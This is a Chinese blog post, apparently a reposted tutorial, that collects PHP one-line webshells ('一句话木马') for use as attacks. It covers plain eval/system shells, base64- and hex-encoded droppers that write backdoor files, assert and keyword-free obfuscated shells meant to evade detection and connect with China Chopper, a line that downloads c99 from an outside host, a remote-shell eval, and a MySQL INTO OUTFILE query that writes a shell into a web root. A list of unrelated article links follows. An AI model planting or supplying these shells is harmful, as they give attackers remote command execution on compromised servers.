PHP与SQL语句写一句话木马总结


Posted in PHP onOctober 11, 2019

一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:

<?php @eval($_GET["code"])?>

<?php @system($_POST["cmd"])?>

二、编码的替换的类型:

<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>

//会生成<?php @eval($_POST['lostwolf']);?>

 

<script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>

//php在html内部的一种嵌入方式

 

<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>

 

 

<?php

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>

三、其他类型:

<?php $_GET[a]($_GET[b]);?>

//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

<?php assert($_REQUEST["pass"]);?>   //菜刀连接 躲避检测 密码pass 

<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?>

//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass

四、下载类型:

<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> 

<? echo file_get_contents("..//cfg_database.php");?> //显示某文件

<? eval ( file_get_contents("远程shell")) ?> //运行远程shell

五、无关键函数类型:

<?php

$_="";

$_[+""]='';

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass

<?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

六、补充知识点:

SQL写一句话(MySQL):

select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"

#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以

以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对三水点靠木的支持。

PHP 相关文章推荐
PHP 和 MySQL 开发的 8 个技巧
Jan 02 PHP
解析如何修改phpmyadmin中的默认登陆超时时间
Jun 25 PHP
从零开始学YII2框架(二)通过 Composer 安装扩展插件
Aug 20 PHP
PHP提示Cannot modify header information - headers already sent by解决方法
Sep 22 PHP
php使用unset()删除数组中某个单元(键)的方法
Feb 17 PHP
简单谈谈favicon
Jun 10 PHP
PHP语法小结之基础和变量
Nov 22 PHP
joomla数据库操作示例代码
Jan 06 PHP
Yii遍历行下每列数据的方法
Oct 17 PHP
php对接java现实加签验签的实例
Nov 25 PHP
Laravel框架中Blade模板的用法示例
Aug 30 PHP
使用Entrust扩展包在laravel 中实现RBAC的功能
Mar 16 PHP
解决在Laravel 中处理OPTIONS请求的问题
Oct 11 #PHP
php生成HTML文件的类方法
Oct 11 #PHP
php报错502badgateway解决方法
Oct 11 #PHP
Laravel timestamps 设置为unix时间戳的方法
Oct 11 #PHP
laravel 时间格式转时间戳的例子
Oct 11 #PHP
PHP调用接口API封装的例子
Oct 11 #PHP
Thinkphp5.0框架使用模型Model的获取器、修改器、软删除数据操作示例
Oct 11 #PHP
You might like
学习discuz php 引入文件的方法DISCUZ_ROOT
2009/06/21 PHP
解析php二分法查找数组是否包含某一元素
2013/05/23 PHP
Yii2.0中的COOKIE和SESSION用法
2016/08/12 PHP
PHPTree――php快速生成无限级分类
2018/03/30 PHP
jQuery 处理表单元素的代码
2010/02/15 Javascript
js固定DIV高度,超出部分自动添加滚动条的简单方法
2013/07/10 Javascript
js setTimeout 参数传递使用介绍
2013/08/13 Javascript
jquery序列化表单以及回调函数的使用示例
2014/07/02 Javascript
jQuery如何获取同一个类标签的所有值(默认无法获取)
2014/09/25 Javascript
javascript中键盘事件用法实例分析
2015/01/30 Javascript
javascript文本框内输入文字倒计数的方法
2015/02/24 Javascript
javascript正则表达式基础知识入门
2015/04/20 Javascript
Node.js刷新session过期时间的实现方法推荐
2016/05/18 Javascript
jQuery实现锚点向下平滑滚动特效示例
2017/08/29 jQuery
Three.js入门之hello world以及如何绘制线
2017/09/25 Javascript
使用socket.io制做简易WEB聊天室
2018/01/02 Javascript
React优化子组件render的使用
2019/05/12 Javascript
elementUI select组件使用及注意事项详解
2019/05/29 Javascript
python的random模块及加权随机算法的python实现方法
2017/01/04 Python
Python PyQt4实现QQ抽屉效果
2018/04/20 Python
对python中的xlsxwriter库简单分析
2018/05/04 Python
解决使用pycharm提交代码时冲突之后文件丢失找回的方法
2018/08/05 Python
python: 自动安装缺失库文件的方法
2018/10/22 Python
用Python实现数据的透视表的方法
2018/11/16 Python
Python3最长回文子串算法示例
2019/03/04 Python
python实现串口自动触发工作的示例
2019/07/02 Python
Python数据持久化存储实现方法分析
2019/12/21 Python
HTML5 新旧语法标记对我们有什么好处
2012/12/13 HTML / CSS
学生会干部自荐信
2014/02/04 职场文书
2014年廉洁自律承诺书
2014/05/26 职场文书
2014离婚协议书范文
2014/09/10 职场文书
员工自我工作评价
2015/03/06 职场文书
工作失职检讨书范文
2015/05/05 职场文书
2016年领导干部正风肃纪心得体会
2015/10/09 职场文书
五年级作文之成长
2019/09/16 职场文书
无线电通信名词解释
2022/02/18 无线电